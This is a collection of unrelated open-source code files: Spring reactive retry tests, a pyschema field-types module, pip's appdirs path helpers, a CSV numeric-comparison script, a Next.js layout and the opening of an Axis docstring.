new MethodRetrySpec((m, t) -> true, 3, Duration.ofMillis(10), Duration.ofMillis(5), 1.5, Duration.ofMillis(50))));
AlwaysFailsBean proxy = (AlwaysFailsBean) pf.getProxy();
// The predicate accepts any Throwable, so even a RuntimeException
// (NumberFormatException) is retried until exhaustion.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(NumberFormatException.class)
.withMessage("always fails");
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
// Tests for the @Retryable 'timeout' attribute: once the timeout elapses,
// no further retries are attempted and a TimeoutException surfaces as the cause.
@Nested
class TimeoutTests {
private final AnnotatedMethodBean proxy = getProxiedAnnotatedMethodBean();
private final AnnotatedMethodBean target = (AnnotatedMethodBean) AopProxyUtils.getSingletonTarget(proxy);
@Test
void timeoutNotExceededAfterInitialSuccess() {
String result = proxy.retryOperationWithTimeoutNotExceededAfterInitialSuccess().block();
assertThat(result).isEqualTo("success");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void timeoutNotExceededAndRetriesExhausted() {
// Retries run to exhaustion before the (generous) timeout expires.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutNotExceededAndRetriesExhausted().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Test
void timeoutExceededAfterInitialFailure() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterInitialFailure().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void timeoutExceededAfterFirstDelayButBeforeFirstRetry() {
// The configured delay (100ms) alone exceeds the 20ms timeout.
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterFirstDelayButBeforeFirstRetry().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void timeoutExceededAfterFirstRetry() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterFirstRetry().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 1 retry
assertThat(target.counter).hasValue(2);
}
@Test
void timeoutExceededAfterSecondRetry() {
assertThatRuntimeException()
.isThrownBy(() -> proxy.retryOperationWithTimeoutExceededAfterSecondRetry().block())
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(TimeoutException.class)
.withMessageContaining("within 20ms");
// 1 initial attempt + 2 retries
assertThat(target.counter).hasValue(3);
}
}
// Matches reactor.core.Exceptions$ReactiveException by name, avoiding a
// compile-time reference to Reactor's package-private wrapper type.
private static ThrowingConsumer<? super Throwable> isReactiveException() {
return throwable -> {
String actualClassName = throwable.getClass().getName();
assertThat(actualClassName).isEqualTo("reactor.core.Exceptions$ReactiveException");
};
}
// Matches Reactor's RetryExhaustedException via Exceptions.isRetryExhausted.
private static ThrowingConsumer<? super Throwable> isRetryExhaustedException() {
return ex -> assertThat(ex).matches(Exceptions::isRetryExhausted, "is RetryExhaustedException");
}
// Returns an AnnotatedMethodBean proxied by the retry post-processor.
private static AnnotatedMethodBean getProxiedAnnotatedMethodBean() {
BeanFactory bf = createBeanFactoryFor(AnnotatedMethodBean.class);
return bf.getBean(AnnotatedMethodBean.class);
}
// Returns an AnnotatedClassBean proxied by the retry post-processor.
private static AnnotatedClassBean getProxiedAnnotatedClassBean() {
BeanFactory bf = createBeanFactoryFor(AnnotatedClassBean.class);
return bf.getBean(AnnotatedClassBean.class);
}
// Builds a minimal application context containing the bean under test,
// the retry post-processor, and the retry event listener, then refreshes it
// so that post-processing (proxying) takes place.
private static BeanFactory createBeanFactoryFor(Class<?> beanClass) {
GenericApplicationContext bf = new GenericApplicationContext();
bf.registerBeanDefinition("bean", new RootBeanDefinition(beanClass));
bf.registerBeanDefinition("processor", new RootBeanDefinition(RetryAnnotationBeanPostProcessor.class));
bf.registerBeanDefinition("listener", new RootBeanDefinition(MethodRetryEventListener.class));
bf.refresh();
return bf;
}
// Bean with no @Retryable metadata: operations must fail without any retry.
static class NonAnnotatedBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
// Bean with method-level @Retryable declarations; the counter tracks how many
// times each operation's callable actually ran (attempts = 1 + retries).
static class AnnotatedMethodBean {
AtomicInteger counter = new AtomicInteger();
@Retryable(maxRetries = 5, delay = 10)
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
@Retryable(maxRetries = 5, delay = 10)
public Mono<String> retryOperationWithInitialSuccess() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
return "success";
});
}
@Retryable(maxRetries = 5, delay = 10)
public Mono<String> retryOperationWithSuccessAfterInitialFailure() {
return Mono.fromCallable(() -> {
// Fail exactly once, then succeed on the first retry.
if (counter.incrementAndGet() == 1) {
throw new IOException(counter.toString());
}
return "success";
});
}
@Retryable(timeout = 555, delay = 10)
public Mono<String> retryOperationWithTimeoutNotExceededAfterInitialSuccess() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
return "success";
});
}
@Retryable(timeout = 555, delay = 10)
public Mono<Object> retryOperationWithTimeoutNotExceededAndRetriesExhausted() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 0)
public Mono<Object> retryOperationWithTimeoutExceededAfterInitialFailure() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
// Sleep longer than the 20ms timeout so it expires during the first attempt.
Thread.sleep(100);
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 100) // Delay > Timeout
public Mono<Object> retryOperationWithTimeoutExceededAfterFirstDelayButBeforeFirstRetry() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 0)
public Mono<Object> retryOperationWithTimeoutExceededAfterFirstRetry() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
// Sleep during the second attempt (first retry) to trip the timeout there.
if (counter.get() == 2) {
Thread.sleep(100);
}
throw new IOException(counter.toString());
});
}
@Retryable(timeout = 20, delay = 0)
public Mono<Object> retryOperationWithTimeoutExceededAfterSecondRetry() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
// Sleep during the third attempt (second retry) to trip the timeout there.
if (counter.get() == 3) {
Thread.sleep(100);
}
throw new IOException(counter.toString());
});
}
}
// Bean with a class-level @Retryable declaration shared by all methods
// (except overrideOperation, which declares its own local config).
@Retryable(delay = 10, jitter = 5, multiplier = 2.0, maxDelay = 40,
includes = IOException.class, excludes = AccessDeniedException.class,
predicate = RejectMalformedInputException3Predicate.class)
static class AnnotatedClassBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> ioOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
// Third attempt throws MalformedInputException("3"), which the
// class-level predicate rejects for further retries.
if (counter.get() == 3) {
throw new MalformedInputException(counter.get());
}
throw new IOException(counter.toString());
});
}
public Mono<Object> fileSystemOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new FileSystemException(counter.toString());
});
}
public Mono<Object> fileSystemOperationWithNestedException() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
// The matching IOException is nested as the cause of a RuntimeException.
throw new RuntimeException(new FileSystemException(counter.toString()));
});
}
public Mono<Object> accessOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new AccessDeniedException(counter.toString());
});
}
public Mono<Object> arithmeticOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new ArithmeticException(counter.toString());
});
}
@Retryable(includes = IOException.class, maxRetries = 1, delay = 10)
public Flux<Object> overrideOperation() {
return Flux.from(Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new AccessDeniedException(counter.toString());
}));
}
}
// Empty configuration class that just activates @EnableResilientMethods.
@EnableResilientMethods
static class EnablingConfig {
}
// Bean classes for boundary testing
// Always-failing Mono bean used with minimal/zero retry specs.
static class MinimalRetryBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
// Always-failing Mono bean used for the delay=0 with jitter>0 case.
static class ZeroDelayJitterBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
// Always-failing Mono bean used for the jitter > delay case.
static class JitterGreaterThanDelayBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
});
}
}
// Always-failing Flux bean used for the multi-value stream case.
static class FluxMultiValueBean {
AtomicInteger counter = new AtomicInteger();
public Flux<Object> retryOperation() {
return Flux.from(Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new IOException(counter.toString());
}));
}
}
// Bean whose operation always succeeds, proving retries never trigger.
static class SuccessfulOperationBean {
AtomicInteger counter = new AtomicInteger();
public Mono<String> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
return "success";
});
}
}
// Bean that always throws an unchecked NumberFormatException with a fixed message.
static class AlwaysFailsBean {
AtomicInteger counter = new AtomicInteger();
public Mono<Object> retryOperation() {
return Mono.fromCallable(() -> {
counter.incrementAndGet();
throw new NumberFormatException("always fails");
});
}
}
} | java | github | https://github.com/spring-projects/spring-framework | spring-context/src/test/java/org/springframework/resilience/ReactiveRetryInterceptorTests.java |
# Copyright (c) 2013 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import datetime
import core
import copy
from core import ParseError, Field, auto_store, PySchema
import binascii
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
def ordereddict_push_front(dct, key, value):
    """Return a copy of ``dct`` with ``key: value`` inserted at the front.

    The original mapping is not modified. If ``key`` already exists in
    ``dct``, its value is overwritten by the one from ``dct`` (matching
    ``OrderedDict.update`` semantics) while keeping the front position.
    """
    result = OrderedDict([(key, value)])
    for existing_key in dct:
        result[existing_key] = dct[existing_key]
    return result
class Text(Field):
    # Field for unicode text (Python 2 code: relies on the `unicode` builtin).

    def load(self, obj):
        # Accept only unicode (or None); anything else is a parse failure.
        if not isinstance(obj, (unicode, type(None))):
            raise ParseError("%r not a unicode object" % obj)
        return obj

    def dump(self, obj):
        # Pass unicode/None through; byte strings are decoded as UTF-8.
        if isinstance(obj, (unicode, type(None))):
            return obj
        else:
            try:
                return obj.decode('utf8')
            except:
                # Not valid UTF-8 (or not a str at all) -> reject.
                raise ValueError(
                    "%r is not a valid UTF-8 string" % obj
                )
class Bytes(Field):
    """Binary data.

    Two wire encodings are supported: the default maps each byte to the
    Unicode codepoint of the same value (latin-1 round-trip); with
    ``custom_encoding=True`` the bytes are base64-encoded instead.
    """
    def __init__(self, custom_encoding=False, **kwargs):
        super(Bytes, self).__init__(**kwargs)
        # True -> use base64; False -> latin-1 codepoint mapping.
        self.custom_encoding = custom_encoding

    def _load_utf8_codepoints(self, obj):
        # Inverse of _dump_utf8_codepoints: codepoints 0-255 back to bytes.
        return obj.encode("iso-8859-1")

    def _dump_utf8_codepoints(self, binary_data):
        return binary_data.decode("iso-8859-1")

    def _load_b64(self, obj):
        return binascii.a2b_base64(obj.encode("ascii"))

    def _dump_b64(self, binary_data):
        # b2a_base64 appends a newline; strip it for a clean token.
        return binascii.b2a_base64(binary_data).rstrip('\n')

    def load(self, obj):
        if not self.custom_encoding:
            return self._load_utf8_codepoints(obj)
        return self._load_b64(obj)

    def dump(self, binary_data):
        # Unicode input is ambiguous for a binary field; require bytes.
        if isinstance(binary_data, unicode):
            raise ValueError(
                "Unicode objects are not accepted values for Bytes (%r)"
                % (binary_data,)
            )
        if not self.custom_encoding:
            return self._dump_utf8_codepoints(binary_data)
        return self._dump_b64(binary_data)

    def is_similar_to(self, other):
        return super(Bytes, self).is_similar_to(other) and self.custom_encoding == other.custom_encoding
class List(Field):
    """List of one other Field type
    Differs from other fields in that it is not nullable
    and defaults to empty array instead of null
    """
    def __init__(self, field_type=Text(), nullable=False, default=[], **kwargs):
        super(List, self).__init__(nullable=nullable, default=default, **kwargs)
        # Field instance used to (de)serialize every element.
        self.field_type = field_type

    def load(self, obj):
        if not isinstance(obj, list):
            raise ParseError("%r is not a list object" % obj)
        return [self.field_type.load(o) for o in obj]

    def dump(self, obj):
        # Tuples are accepted on output but always dumped as JSON arrays.
        if not isinstance(obj, (tuple, list)):
            raise ValueError("%r is not a list object" % obj)
        return [self.field_type.dump(o) for o in obj]

    def set_parent(self, schema):
        # Forward parent resolution to the element field (for SubRecord(SELF)).
        self.field_type.set_parent(schema)

    def default_value(self):
        # avoid default-sharing between records
        return copy.deepcopy(self.default)

    def is_similar_to(self, other):
        return super(List, self).is_similar_to(other) and self.field_type.is_similar_to(other.field_type)

    def repr_vars(self):
        return ordereddict_push_front(
            super(List, self).repr_vars(),
            "field_type",
            repr(self.field_type)
        )
class Enum(Field):
    # Text field restricted to a fixed set of allowed values.
    _field_type = Text()  # don't change

    def __init__(self, values, name=None, **kwargs):
        super(Enum, self).__init__(**kwargs)
        self.values = set(values)
        self.name = name
        # Named enums are registered globally when auto-registration is on.
        if name is not None and PySchema.auto_register:
            auto_store.add_enum(self)

    def dump(self, obj):
        if obj not in self.values:
            raise ValueError(
                "%r is not an allowed value of Enum%r"
                % (obj, tuple(self.values)))
        return self._field_type.dump(obj)

    def load(self, obj):
        # None is tolerated on load; any other out-of-set value is rejected.
        parsed = self._field_type.load(obj)
        if parsed not in self.values and parsed is not None:
            raise ParseError(
                "Parsed value %r not in allowed value of Enum(%r)"
                % (parsed, tuple(self.values)))
        return parsed

    def is_similar_to(self, other):
        return super(Enum, self).is_similar_to(other) and self.values == other.values

    def repr_vars(self):
        # Py2: dict.items() returns a list, so `+` concatenation works here.
        return OrderedDict([
            ("values", self.values),
            ("name", repr(self.name))
        ] + super(Enum, self).repr_vars().items()
        )
class Integer(Field):
    # Integer field; `size` (bytes) only affects schema similarity/repr,
    # not validation of the value range.
    def __init__(self, size=8, **kwargs):
        super(Integer, self).__init__(**kwargs)
        self.size = size

    def dump(self, obj):
        # bool is an int subclass in Python, so reject it explicitly.
        if not isinstance(obj, (int, long, type(None))) or isinstance(obj, bool):
            raise ValueError("%r is not a valid Integer" % (obj,))
        return obj

    def load(self, obj):
        if not isinstance(obj, (int, long, type(None))) or isinstance(obj, bool):
            raise ParseError("%r is not a valid Integer" % (obj,))
        return obj

    def is_similar_to(self, other):
        return super(Integer, self).is_similar_to(other) and self.size == other.size

    def repr_vars(self):
        return ordereddict_push_front(
            super(Integer, self).repr_vars(),
            "size",
            self.size
        )
class Boolean(Field):
    # Accepted inputs; only the keys are consulted below — the '1'/'0'
    # string values are not used by dump/load, which return bool.
    VALUE_MAP = {True: '1', 1: '1',
                 False: '0', 0: '0'}

    def dump(self, obj):
        if obj not in self.VALUE_MAP:
            raise ValueError(
                "Invalid value for Boolean field: %r" % obj)
        return bool(obj)

    def load(self, obj):
        if obj not in self.VALUE_MAP:
            raise ParseError(
                "Invalid value for Boolean field: %r" % obj)
        return bool(obj)
class Float(Field):
    # Floating-point field; `size` only affects schema similarity.
    # NOTE(review): unlike Integer, dump() rejects ints and None while
    # load() accepts ints/longs — asymmetry appears intentional but verify.
    def __init__(self, size=8, **kwargs):
        super(Float, self).__init__(**kwargs)
        self.size = size

    def dump(self, obj):
        if not isinstance(obj, float):
            raise ValueError("Invalid value for Float field: %r" % obj)
        return float(obj)

    def load(self, obj):
        # Integers coming off the wire are coerced to float.
        if not isinstance(obj, (float, int, long)):
            raise ParseError("Invalid value for Float field: %r" % obj)
        return float(obj)

    def is_similar_to(self, other):
        return super(Float, self).is_similar_to(other) and self.size == other.size
class Date(Text):
    # datetime.date serialized as "YYYY-MM-DD" text.

    def dump(self, obj):
        if not isinstance(obj, datetime.date):
            raise ValueError("Invalid value for Date field: %r" % obj)
        return str(obj)

    def load(self, obj):
        try:
            # This is much faster than calling strptime
            (year, month, day) = obj.split('-')
            return datetime.date(int(year), int(month), int(day))
        except ValueError:
            # Covers wrong part count, non-numeric parts and invalid dates.
            raise ValueError("Invalid value for Date field: %r" % obj)
class DateTime(Text):
    # datetime.datetime serialized as "YYYY-MM-DD HH:MM:SS[.ffffff]" text.

    def dump(self, obj):
        if not isinstance(obj, datetime.datetime):
            raise ValueError("Invalid value for DateTime field: %r" % obj)
        return str(obj)

    def load(self, obj):
        try:
            # A '.' indicates a fractional-seconds component.
            if '.' in obj:
                return datetime.datetime.strptime(obj, "%Y-%m-%d %H:%M:%S.%f")
            return datetime.datetime.strptime(obj, "%Y-%m-%d %H:%M:%S")
        except ValueError:
            # Bug fix: message previously said "DateField field".
            raise ValueError("Invalid value for DateTime field: %r" % obj)
# special value for SubRecord's schema parameter
# that signifies a SubRecord accepting records of the
# same type as the container/parent Record.
# (A unique sentinel object; compared by identity/equality in set_parent.)
SELF = object()
class SubRecord(Field):
    """Field for storing other :class:`record.Record`s"""
    def __init__(self, schema, **kwargs):
        super(SubRecord, self).__init__(**kwargs)
        # Either a Record class or the SELF sentinel (resolved in set_parent).
        self._schema = schema

    def dump(self, obj):
        if not isinstance(obj, self._schema):
            raise ValueError("%r is not a %r"
                             % (obj, self._schema))
        return core.to_json_compatible(obj)

    def load(self, obj):
        return core.from_json_compatible(self._schema, obj)

    def set_parent(self, schema):
        """This method gets called by the metaclass
        once the container class has been created
        to let the field store a reference to its
        parent if needed. Its needed for SubRecords
        in case it refers to the container record.
        """
        if self._schema == SELF:
            self._schema = schema

    def default_value(self):
        # avoid default-sharing between records
        return copy.deepcopy(self.default)

    def is_similar_to(self, other):
        return super(SubRecord, self).is_similar_to(other) and self._schema == other._schema

    def repr_vars(self):
        return ordereddict_push_front(
            super(SubRecord, self).repr_vars(),
            "schema",
            self._schema._schema_name
        )
class Map(Field):
    """Dict mapping Text keys to values of one other Field type.

    Differs from most fields in that it is not nullable
    and defaults to an empty dict instead of null.
    """
    def __init__(self, value_type, nullable=False, default={}, **kwargs):
        super(Map, self).__init__(nullable=nullable, default=default, **kwargs)
        self.value_type = value_type
        # Keys are always serialized as text.
        self.key_type = Text()

    def load(self, obj):
        return dict([
            (self.key_type.load(k),
             self.value_type.load(v))
            for k, v in obj.iteritems()
        ])

    def dump(self, obj):
        if not isinstance(obj, dict):
            raise ValueError("%r is not a dict" % (obj,))
        return dict([
            (self.key_type.dump(k),
             self.value_type.dump(v))
            for k, v in obj.iteritems()
        ])

    def set_parent(self, schema):
        # Forward parent resolution to the value field (for SubRecord(SELF)).
        self.value_type.set_parent(schema)

    def default_value(self):
        # avoid default-sharing between records
        return copy.deepcopy(self.default)

    def is_similar_to(self, other):
        return super(Map, self).is_similar_to(other) and self.value_type.is_similar_to(other.value_type)

    def repr_vars(self):
        return ordereddict_push_front(
            super(Map, self).repr_vars(),
            "value_type",
            repr(self.value_type)
        )
"""
This code was taken from https://github.com/ActiveState/appdirs and modified
to suit our purposes.
"""
from __future__ import absolute_import
import os
import sys
from pip.compat import WINDOWS, expanduser
from pip._vendor.six import PY2, text_type
def user_cache_dir(appname):
    r"""
    Return full path to the user-specific cache dir for this application.
    "appname" is the name of application.
    Typical user cache directories are:
        macOS:      ~/Library/Caches/<AppName>
        Unix:       ~/.cache/<AppName> (XDG default)
        Windows:    C:\Users\<username>\AppData\Local\<AppName>\Cache
    On Windows the only suggestion in the MSDN docs is that local settings go
    in the `CSIDL_LOCAL_APPDATA` directory. This is identical to the
    non-roaming app data dir (the default returned by `user_data_dir`). Apps
    typically put cache data somewhere *under* the given dir here. Some
    examples:
        ...\Mozilla\Firefox\Profiles\<ProfileName>\Cache
        ...\Acme\SuperApp\Cache\1.0
    OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value.
    """
    if WINDOWS:
        # Get the base path
        path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))
        # When using Python 2, return paths as bytes on Windows like we do on
        # other operating systems. See helper function docs for more details.
        if PY2 and isinstance(path, text_type):
            path = _win_path_to_bytes(path)
        # Add our app name and Cache directory to it
        path = os.path.join(path, appname, "Cache")
    elif sys.platform == "darwin":
        # Get the base path
        path = expanduser("~/Library/Caches")
        # Add our app name to it
        path = os.path.join(path, appname)
    else:
        # Get the base path; honour $XDG_CACHE_HOME per the XDG spec.
        path = os.getenv("XDG_CACHE_HOME", expanduser("~/.cache"))
        # Add our app name to it
        path = os.path.join(path, appname)
    return path
def user_data_dir(appname, roaming=False):
    """
    Return full path to the user-specific data dir for this application.
    "appname" is the name of application.
    If None, just the system directory is returned.
    "roaming" (boolean, default False) can be set True to use the Windows
    roaming appdata directory. That means that for users on a Windows
    network setup for roaming profiles, this user data will be
    sync'd on login. See
    <http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
    for a discussion of issues.
    Typical user data directories are:
        macOS:                  ~/Library/Application Support/<AppName>
        Unix:                   ~/.local/share/<AppName>    # or in
                                $XDG_DATA_HOME, if defined
        Win XP (not roaming):   C:\\Documents and Settings\\<username>\\ ...
                                ...Application Data\\<AppName>
        Win XP (roaming):       C:\\Documents and Settings\\<username>\\Local ...
                                ...Settings\\Application Data\\<AppName>
        Win 7  (not roaming):   C:\\Users\\<username>\\AppData\\Local\\<AppName>
        Win 7  (roaming):       C:\\Users\\<username>\\AppData\\Roaming\\<AppName>
    For Unix, we follow the XDG spec and support $XDG_DATA_HOME.
    That means, by default "~/.local/share/<AppName>".
    """
    if WINDOWS:
        # Conditional expression replaces the legacy `x and a or b` idiom,
        # which silently picks `b` whenever `a` is falsy.
        const = "CSIDL_APPDATA" if roaming else "CSIDL_LOCAL_APPDATA"
        path = os.path.join(os.path.normpath(_get_win_folder(const)), appname)
    elif sys.platform == "darwin":
        path = os.path.join(
            expanduser('~/Library/Application Support/'),
            appname,
        )
    else:
        # XDG spec: $XDG_DATA_HOME, defaulting to ~/.local/share.
        path = os.path.join(
            os.getenv('XDG_DATA_HOME', expanduser("~/.local/share")),
            appname,
        )
    return path
def user_config_dir(appname, roaming=True):
    """Return full path to the user-specific config dir for this application.
    "appname" is the name of application.
    If None, just the system directory is returned.
    "roaming" (boolean, default True) can be set False to not use the
    Windows roaming appdata directory. That means that for users on a
    Windows network setup for roaming profiles, this user data will be
    sync'd on login. See
    <http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
    for a discussion of issues.
    Typical user data directories are:
        macOS:      same as user_data_dir
        Unix:       ~/.config/<AppName>
        Win *:      same as user_data_dir
    For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME.
    That means, by default "~/.config/<AppName>".
    """
    if WINDOWS:
        # Windows keeps config alongside data; roaming defaults to True here.
        path = user_data_dir(appname, roaming=roaming)
    elif sys.platform == "darwin":
        path = user_data_dir(appname)
    else:
        # XDG spec: $XDG_CONFIG_HOME, defaulting to ~/.config.
        path = os.getenv('XDG_CONFIG_HOME', expanduser("~/.config"))
        path = os.path.join(path, appname)
    return path
# for the discussion regarding site_config_dirs locations
# see <https://github.com/pypa/pip/issues/1733>
def site_config_dirs(appname):
    """Return a list of potential user-shared config dirs for this application.
    "appname" is the name of application.
    Typical user config directories are:
        macOS:      /Library/Application Support/<AppName>/
        Unix:       /etc or $XDG_CONFIG_DIRS[i]/<AppName>/ for each value in
                    $XDG_CONFIG_DIRS
        Win XP:     C:\\Documents and Settings\\All Users\\Application ...
                    ...Data\\<AppName>\\
        Vista:      (Fail! "C:\\ProgramData" is a hidden *system* directory
                    on Vista.)
        Win 7:      Hidden, but writeable on Win 7:
                    C:\\ProgramData\\<AppName>\\
    """
    if WINDOWS:
        path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA"))
        pathlist = [os.path.join(path, appname)]
    elif sys.platform == 'darwin':
        pathlist = [os.path.join('/Library/Application Support', appname)]
    else:
        # try looking in $XDG_CONFIG_DIRS (colon-separated on Unix)
        xdg_config_dirs = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg')
        if xdg_config_dirs:
            pathlist = [
                os.path.join(expanduser(x), appname)
                for x in xdg_config_dirs.split(os.pathsep)
            ]
        else:
            pathlist = []
        # always look in /etc directly as well
        pathlist.append('/etc')
    return pathlist
# -- Windows support functions --
def _get_win_folder_from_registry(csidl_name):
    """
    This is a fallback technique at best. I'm not sure if using the
    registry for this guarantees us the correct answer for all CSIDL_*
    names.
    """
    import _winreg

    # Registry value names for the supported CSIDL constants.
    names = {
        "CSIDL_APPDATA": "AppData",
        "CSIDL_COMMON_APPDATA": "Common AppData",
        "CSIDL_LOCAL_APPDATA": "Local AppData",
    }
    shell_folder_name = names[csidl_name]

    key = _winreg.OpenKey(
        _winreg.HKEY_CURRENT_USER,
        r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
    )
    directory, _type = _winreg.QueryValueEx(key, shell_folder_name)
    return directory
def _get_win_folder_with_ctypes(csidl_name):
    # Resolve the special-folder path via SHGetFolderPathW.
    csidl_const = {
        "CSIDL_APPDATA": 26,
        "CSIDL_COMMON_APPDATA": 35,
        "CSIDL_LOCAL_APPDATA": 28,
    }[csidl_name]

    buf = ctypes.create_unicode_buffer(1024)
    ctypes.windll.shell32.SHGetFolderPathW(None, csidl_const, None, 0, buf)

    # Downgrade to the short path name if the result has highbit chars. See
    # <http://bugs.activestate.com/show_bug.cgi?id=85099>.
    if any(ord(ch) > 255 for ch in buf):
        short = ctypes.create_unicode_buffer(1024)
        if ctypes.windll.kernel32.GetShortPathNameW(buf.value, short, 1024):
            buf = short

    return buf.value
# Pick the implementation used to resolve Windows special folders:
# prefer ctypes (exact, Unicode-aware), fall back to the registry
# technique when ctypes is unavailable.
if WINDOWS:
    try:
        import ctypes
        _get_win_folder = _get_win_folder_with_ctypes
    except ImportError:
        _get_win_folder = _get_win_folder_from_registry
def _win_path_to_bytes(path):
"""Encode Windows paths to bytes. Only used on Python 2.
Motivation is to be consistent with other operating systems where paths
are also returned as bytes. This avoids problems mixing bytes and Unicode
elsewhere in the codebase. For more details and discussion see
<https://github.com/pypa/pip/issues/3463>.
If encoding using ASCII and MBCS fails, return the original Unicode path.
"""
for encoding in ('ASCII', 'MBCS'):
try:
return path.encode(encoding)
except (UnicodeEncodeError, LookupError):
pass
return path | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python

import sys

# Refuse to run on Python 2: the script relies on Python 3 semantics.
# (Fixed typo in the message: "og" -> "or".)
if sys.version_info < (3, 0):
    sys.stdout.write("Sorry, Python 3 or higher required\n")
    sys.exit(1)

import argparse, pandas
from math import fabs

# Command-line interface: compare a reference CSV against a new CSV,
# allowing numeric values to differ within a relative tolerance.
parser = argparse.ArgumentParser(description='Numerically compare two CSV files')
parser.add_argument('--tol', default=0.02, type=float, help='relative error tolerance (default: 0.02)')
parser.add_argument('--small', default=1e-10, type=float, help='always equal if difference is smaller than this (default: 1e-10)')
parser.add_argument('--quiet', '-q', dest='quiet', action='store_true', help='less output')
parser.add_argument('--csv_sep', default=' ', help='CSV separator (default: " ")')
parser.add_argument('file_ref', help='reference file')
parser.add_argument('file_new', help='new file')
args = parser.parse_args()

# Exit status: 0 = match, 1 = mismatch found, 2 = could not load both files.
returncode = 0
def isapprox(a, b):
    """Approximate equality: negligible absolute difference, or within the
    relative tolerance scaled by the reference value ``a``."""
    diff = fabs(a - b)
    return diff < args.small or diff < args.tol * fabs(a)
def isnumber(val):
    ''' filter to compare only ints and floats '''
    return isinstance(val, (float, int))
def compare(a, b):
    ''' compare ints and floats to relative tolerence '''
    both_numeric = isnumber(a) and isnumber(b)
    return isapprox(a, b) if both_numeric else a == b
# Load both files, then walk them column-by-column, value-by-value.
dfs = [pandas.read_csv(f, sep=args.csv_sep, header=None) for f in (args.file_ref, args.file_new)]
if len(dfs) == 2:
    # DataFrame.iteritems() was deprecated in pandas 1.5 and removed in
    # pandas 2.0; DataFrame.items() is the long-supported equivalent.
    for (ref_col_name, ref_col), (new_col_name, new_col) in zip(*(df.items() for df in dfs)):
        for ref_val, new_val in zip(ref_col, new_col):
            if not compare(ref_val, new_val):
                if returncode == 0:
                    returncode = 1
                if not args.quiet:
                    print('mismatch in col {:2d} {} {}'.format(ref_col_name, ref_val, new_val))
else:
    returncode = 2
sys.exit(returncode)
import React from 'react'
export default function Layout({ children }) {
return (
<html>
<head>
<title>My App</title>
</head>
<body>{children}</body>
</html>
)
} | javascript | github | https://github.com/vercel/next.js | bench/basic-app/app/layout.js |
"""
The Axis class display an axis on a graph
The axis contains a line with configurable style, possible arrows, and a title
.. attribute:: line_style
The LineStyle with which the axis line is drawn
.. attribute:: title
The string to be displayed alongside the axis
.. attribute:: title_above
A boolean which specifies whether the title should be placed above or below the axis
Normally the title would be above for top and left axes.
.. attribute:: title_location
